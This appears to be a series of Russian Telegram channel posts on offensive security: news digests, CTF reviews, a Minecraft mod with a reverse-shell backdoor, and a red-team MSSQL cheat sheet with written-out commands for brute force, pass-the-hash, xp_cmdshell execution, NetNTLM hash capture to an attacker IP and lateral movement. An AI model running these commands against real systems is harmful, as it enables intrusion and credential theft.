Добрый день, коллеги! ☕️

Новая неделя в самом разгаре. Предлагаем вам налить себе чашку кофе и вспомнить с нами события прошедшей недели!


💀Атаки на IIS с использованием публичных ASP. NET Machine Keys

🔍 Microsoft Threat Intelligence обнаружила более 3,000 утекших ASP. NET machine keys, которые злоумышленники используют для атак на IIS-серверы. Эти ключи, найденные в публичных репозиториях и документации, позволяют атакующим выполнять ViewState-инъекции и разворачивать Godzilla Malware.

Как работает атака?

1️⃣ViewState отвечает за сохранение состояния страниц в ASP. NET.
2️⃣ Для его защиты используются ValidationKey и DecryptionKey.
3️⃣Если эти ключи утекли, атакующие создают вредоносный ViewState и отправляют его на сервер.
4️⃣ IIS доверяет ViewState и выполняет код с привилегиями веб-приложения.

Рекомендации от Microsoft:

✅ Не используйте публичные machine keys — генерируйте уникальные ключи.
✅ Проверяйте свои ключи по базе хешей публичных ключей
✅ Ротируйте machine keys — регулярное обновление снижает риск компрометации.
✅ Обновите ASP. NET до 4.8 и включите Antimalware Scan Interface (AMSI).

Подробнее об уязвимости и защите — Microsoft Blog


⌨️Разбор LPE-уязвимости в AnyDesk

В сети опубликован анализ уязвимости в AnyDesk (CVE-2024-12754), позволяющей локальному злоумышленнику повысить привилегии до NT AUTHORITY\SYSTEM.

Как это работает?

Когда пользователь инициирует новую сессию, сервис AnyDesk копирует фоновое изображение рабочего стола в C:\Windows\Temp\, сохраняя оригинальное имя файла. Но поскольку низкопривилегированные пользователи могут создавать файлы в этой директории, атакующий может заранее создать файл с тем же именем. В результате служба AnyDesk перезаписывает этот файл с системными привилегиями, передавая злоумышленнику полный контроль.

💻Для любителей покопаться в деталях, ребята из @RedTeambro подготовили Proof-of-Concept, который можно найти здесь: POC

📖 Подробный разбор уязвимости можно найти здесь: LPE AnyDesk research


🛡Обновление безопасности Android

Google выпустила обновление безопасности для Android, устраняющее 47 уязвимостей, многие из которых являются критическими.

Наиболее критичные уязвимости:

CVE-2024-53104: Уязвимость высокой степени опасности в драйвере USB Video Class (UVC) ядра Linux. Проблема связана с некорректной обработкой видеокадров, что приводит к записи данных за пределами допустимых границ в функции uvc_parse_format(). Это позволяет злоумышленникам повышать привилегии, выполняя произвольный код или вызывая сбои устройства.

CVE-2024-45569: Критическая уязвимость в компонентах WLAN от Qualcomm с оценкой CVSS 9.8. Она связана с повреждением памяти из-за неправильной проверки индексов массива при обработке сетевых управляющих кадров, что может привести к удаленному выполнению кода.

Обновление доступно для устройств Google Pixel и будет постепенно распространяться на устройства других вендоров.

Подробнее ознакомиться с обновлением можно здесь


Всем продуктивной и насыщенной недели! Оставайтесь с нами. В ближайшее время добавим для вас больше разнообразного контента!

#news

😎 Привет!
Сначала я хотел оформить этот материал в виде статьи, но думаю, поста будет достаточно.

Я тут недавно заинтересовался темой доставки малварей через игры, в частности, через Minecraft, и прифигел от их количества. Думаю, не для кого не новость, что тем или иным образом возможно вставить вредоносный код внутрь исходного кода, например, невнимательным апрувом пул-реквеста, и он сохранится в последующих версиях, до момента обнаружения. Но в нашем случае всё гораздо легче.

Вернемся к майнкрафту. Так уж получилось, что на самую продаваемую игру в мире сделано самое большое количество модов. А мы знаем, что чем популярнее платформа, тем больше внимания на нее обращают хацкеры. В интернете полно историй про взлом клиентов и серверов через Minecraft, я даже как-то делал пост на эту тему.

Так вот, я решил создать 🔗 мод, который покажет неосведомленным пользователем, почему нехорошо качать модпаки со случайных источников. Сейчас в моде присутствует безобидный бекдур с реверс шеллом на 127.0.0.1 31337/tcp, а также чат-команда /reverseshell для создания шелла на заданный адрес. В будущем предполагается добавить побольше интересных нагрузок и красивый интерфейс внутри игры, но без импакта пользователю (если, конечно, он сам этого не захочетXD)

🙂Привет, друзья!

На собеседованиях я часто спрашиваю про абьюз Microsoft SQL Server, и, к моему удивлению, многие знают о нём поверхностно. А ведь MSSQL широко используется в корпоративных сетях и при неправильной настройке может стать удобной точкой входа для атакующего.

В этом посте я постарался собрать основные техники абьюза MSSQL, которые помогут лучше понять возможные векторы атак, подготовиться к собеседованию и собрать ваши знания воедино.

📖 Немного теории

Microsoft SQL Server (MSSQL) — это реляционная СУБД от Microsoft, активно используемая в корпоративных сетях для хранения и обработки данных.

Основные компоненты:
🔹 Database Engine — отвечает за хранение, обработку и управление данными.
🔹 SQL Server Agent — автоматизация задач (например, резервное копирование).
🔹 SQL Server Browser — помогает клиентам находить MSSQL-инстансы.
🔹 SSIS (SQL Server Integration Services) — инструмент для интеграции данных.
🔹 SSRS (SQL Server Reporting Services) — генерация отчетов.
🔹 SSAS (SQL Server Analysis Services) — аналитика и обработка данных.

Основные роли в MSSQL:
🔹 sysadmin — полные привилегии на сервере.
🔹 db_owner — полные права в конкретной базе данных.
🔹 db_datareader — доступ только на чтение данных.
🔹 db_datawriter — возможность изменять данные.
🔹 public — назначается всем пользователям по умолчанию и может давать больше доступа, чем кажется.

Способы аутентификации:
🔹Windows Authentication — через доменную аутентификацию (NTLM/Kerberos).
🔹 SQL Authentication — локальные учетные записи MSSQL (sa, пользовательские логины).


Обнаружение MSSQL в сети

Прежде чем “что-то” ломать, нам это “что-то” надо найти.

#PowerUpSQL
Get-SQLInstanceDomain

#nmap
nmap -p 1433 --script ms-sql-info <IP>

#Metasploit
auxiliary/scanner/mssql/mssql_ping

#go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName
​

🥰 Доступ к MSSQL

#brute force
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt

#password spraying
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success

#Pass-the-Hash
netexec mssql example.com -u usernames.txt -H <NTLM_HASH> --continue-on-success

impacket-mssqlclient DOMAIN/user@IP -hashes <YourHash>  
​

🤪 Повышение привилегий: от локального админа до sysadmin

Основной процесс SQL Server — это sqlservr.exe. Даже если у учетной записи SQL Server в Windows нет высоких привилегий, в самом SQL Server она по умолчанию получает роль sysadmin.

Компрометация службы SQL Server может привести к компрометации всего домена!

Шаг 1: Найдём локальный SQL Server.

# PowerUpSQL
Get-SQLInstanceLocal

Шаг 2: Получаем учетную запись SQL Server

#PowerUpSQL
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name

​
🤗 Выполнение команд в OS через MSSQL

Злоумышленник, имея доступ к MSSQL, может выполнить команды Windows на сервере. Может он это сделать следующими способами:

🔹CLR (Common Language Runtime) Assembly — это механизм в Microsoft SQL Server, который позволяет выполнять .NET-код (C#, VB.NET, etc.) внутри базы данных.

#PowerUpSQL
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

​
🔹OLE Automation Procedures — это механизм в Microsoft SQL Server, который позволяет запускать объекты COM (Component Object Model) напрямую из T-SQL.

#PowerUpSQL
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"

​
🔹xp_cmdshell - встроенная хранимая процедура в Microsoft SQL Server, которая позволяет выполнять команды Windows напрямую из T-SQL

#SQL Server CLI
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

#PowerUpSQL
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"

<продолжение>


🔹External Scripts (Python/R) - механизм в Microsoft SQL Server, который позволяет выполнять Python и R-код

#SQL Server CLI
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))

EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

#PowerUpSQL
#REMOTE
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

#LOCAL Instance
Get-SQLInstanceLocal | Invoke-SQLOSCmdPyrhon -Verbose -Command "whoami"

Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"

​
👅 UNC Path Injection

Позволяет утянуть NetNTLM-хеш через SMB

#SQL Server CLI
EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';

#PowerUpSQL
Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost

​
🤪 Lateral Movement через Linked Servers

Linked Servers — это механизм в Microsoft SQL Server, который позволяет подключаться к другим SQL Server'ам или внешним базам данных (MySQL, Oracle, PostgreSQL, файловым источникам и т. д.)

#Просмотр связанных серверов
EXEC sp_linkedservers;

#Выполнение команды на удалённом сервере
EXEC ('whoami') AT [LINKED_SERVER];

#PowerUpSQL
#поиск связанных серверов
Get-SQLServerLink -Instance YourInstance -Verbose

#проверка прав на удаленном сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose

#включаем xp_cmdshell на linked сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"​

На этом всё, друзья! 🎯
Всем удачного хакинга и до новых встреч!

#redteam

👨‍💻 Привет!

У нас у всех сейчас плотный график работы (ну вы знаете, эти пентесты), поэтому стараемся выкладывать посты, как можем.

Сегодня я хочу показать, почему плохо использовать Notepad++ для создания временных пометок. Под капотом он раскидывает информацию из несохраненных вкладок по файлам в %appdata%\notepad++\backup\, а на практике многие забывают удалять конфиденциальную информацию, так и оставив её висеть в файле. На гифке 🔗 PoC (куда же без него?) - стиллер этих файлов

Давайте все будем секурными и почистим папку backup 😼

P. S. Я сейчас работаю над одной мега-штукой для канала. Должно получится круто, ждите новостей :)

Друзья, всем привет!!!🤗

Наши друзья с канала «СБПроБизнес» отмечают свой день рождения и приглашают всех на большой праздничный стрим! 👍

📅 Сегодня, 13 марта
⏰ Старт в 12:00 МСК
📍 Канал «СБПроБизнес»
🔗 Ссылка на стрим: https://t.me/sbprobiz/1693

Что вас ждет

🔹 12:00–13:00 — Алексей Швецкий
Тема: «Зачем бизнесу безопасник? Как понять, что мы молодцы?»

🔹 13:00–14:00 — Игорь Бедеров
Тема: «Стань ближе к информационной безопасности!»

🔹 14:00–15:00 — Александр Негода
Тема: «От мифов к реальной защите: роль пентеста в безопасности бизнеса»

😑 А вот тут говорят будет особенно интересно! Наш автор расскажет, зачем бизнесу на самом деле нужен пентест и почему он так важен🙂

🔹 15:00–16:00 — Сергей Суйков
Тема: «Кодекс этики: клятва пионера или свод обычаев?»

🔹 16:00–17:00 — Александр Елин
Тема: «Управление на основе данных. Мобильный цифровой ситуационный центр: примеры из жизни»

🔹 17:00–18:00 — Алексей Меркулов
Тема: «Защита от социальных инженеров»

❕Важно, этот эфир будет не о технических нюансах, а о том, как безопасность помогает бизнесу развиваться, зарабатывать и защищаться от рисков.

Если интересна эта тема и вы хотите больше в ней разобраться, — этот стрим для вас!🐾

💥 Привет!

А тем временем нас набралось уже 800 кулхацкеров 🤯 (УК РФ Статья 272.1: "не блечить"). Спасибо, что вы с нами.

P. S. Думаю, на 1к пора будет создать холиварный чат канала

Всем привет, друзья🐾

Делимся с вами записью эфира в честь дня рождения телеграмм канала СБПроБизнес.

Спикер - Александр Негода (@closed_character).

Тема выступления:

От мифов к реальной защите бизнеса: какую роль играет пентест в безопасности бизнеса?

Посмотреть видео можете по ссылкам:

📺Rutube

📝Дзен

📺ВК

📺YouTube

🤯 Привет!

Все мы хоть раз в той или иной степени прикасались к прекрасному к ЦТФам. Лично я, может и не очень часто, но регулярно стараюсь принимать активность в различных ИБ-соревах. Так вот, недавно прошел Cyber Apocalypse CTF 2025 от HTB, и после него у меня в некотором смысле накипело, хочется высказать свое объективно-субъективное мнение по ошибкам в организации CTF-соревнований, попунктно:

1️⃣ Первая проблема, с которой начинает подгорать уже с первых минут игры - это падение доски сразу после начала. Таски недоступны, личка админов и канала засраны, в общем ничего удивительного. Происходит это потому, что после старта все игроки одновременно жмав кнопку обновления страницы с доской, а поняв, что она перестала работать, начинают обновлять в 5 раз чаще, из-за чего производят распределенную DOS-атаку ⌨️ и ложат сервера. Лечится это вроде просто - временно добавить на первые часы игры больше ресурсов, но на практике такого не происходит;

2️⃣ Система оценивания тасков. Тут уже поинтереснее — Идут постоянные споры на счет оценки. Лично я топлю за динамическое распределение очков, в зависимости от количества решений. Однако, если неправильно настроить отношение решений к общему количеству команд, то произойдет следующее — На прошедшей сореве был таск с 30 решениями и таск с 3000 решениями. За первый дали 950 баллов (из 1000), а за второй, внимание, 800 (из 1000). Хочется плакать, но я не буду;

3️⃣ Еще одна проблема, особенно в глобальных соревах, это флаг-шеринг. Откуда только не просят дать подсказку, начиная с реддита и заканчиваю breach forums. Кто-то даже продает решение таска за 💲валюту💲. Да, есть система проверки, которая добавляет в конец влага id, привязанный к конкретной команде, но это сложно в реализации и не ко всем таскам применимо. Да и эффективность своеобразная;

4️⃣ Собственно, сами таски. Когда в сореве (не от HTB, там всё по заданиям нормально), позиционирующей себя, как не для начинающих, ты видишь категории “stega, crypto, web, osint” (Да простят меня осинтеры), при том, что в крипте лежат 2 таска на шифр Цезаря и статистический анализ, плакать хочется еще больше. Лечится это тоже просто — Обходить стороной такие соревы (без негатива), и держаться крутых, у которых таски приближены к реальности.

Ну вроде всё. Всем желаю находить время на CTF, играть в кайф в команде или в соло, и побежать (опционально)🤩

🤥 Привет!

А я тут провел небольшой ресерч по поводу пивотинга и в частности связка proxychains + nmap. Для поста материала оказалось много, поэтому 🔗 написал в Notion.

Приятного просмотра.

Привет, друзья❤️!

Пока мы затаились в преддверии стендофыча, ловите порцию Битрикса

💻 Привет!

А я тут недавно поиграл в standoff 15 и хочу высказать своё объективно-субъективное мнение:

В целом полигон норм, я ранее делал пост про HTB Pro Labs, и в сравнении с ними он очень даже неплохой. Инфра не вайпается глобально каждые 24 часа, можно попрактиковать сканирование и закрепление. Уязвимости и таски тоже в целом неплохие,
Теперь то, что особенно запомнилось:

1️⃣ Инфра (и сайт стендоффа) стабильно уже который год работает нестабильно, особенно в первый день. В прошлом году на второй день под предлогом слива даже выдавали конфиги во внутреннюю сеть, так как гейты были сильно перегружены трафиком.

2️⃣ Про вайпы инфры я немного наврал. В этот раз орги задумали сделать авторестарт нескольких конкретных сервисов (преимущественно во внешнем сегменте) раз в 10 минут. В целом это убирает проблему старта игры, но также это и убирает нервы, потраченные на постоянных запуск чизела после перезапуска сервисов.

3️⃣ Также в этот раз было нововведение: каждая команда могла использовать только 10 белых адресов и с ограничением трафика с выданных vpn. Таким образом орги хотели ограничить количество людей за команду, К счастью, в игре по итогу вайтлистов не было и с трафиком я проблем не заметил.

4️⃣ Сложность заданий не равна их количеству баллов. В моём случае я в первый день пробил сегмент, в котором оказалось с freeipa, из-за чего я следующие 24 часа вкуривал мануалы, затем забил, запрыгнул на другой сегмент и сразу сдал 3 недопустимых события. Потраченного времени жаль.

В целом ощущение от игры 50 на 50. можно было бы принять синюю таблетку, гулять по PHD и быть в неведении внутренней кухни 🤩 Но играть в следующем году я конечно же буду 👍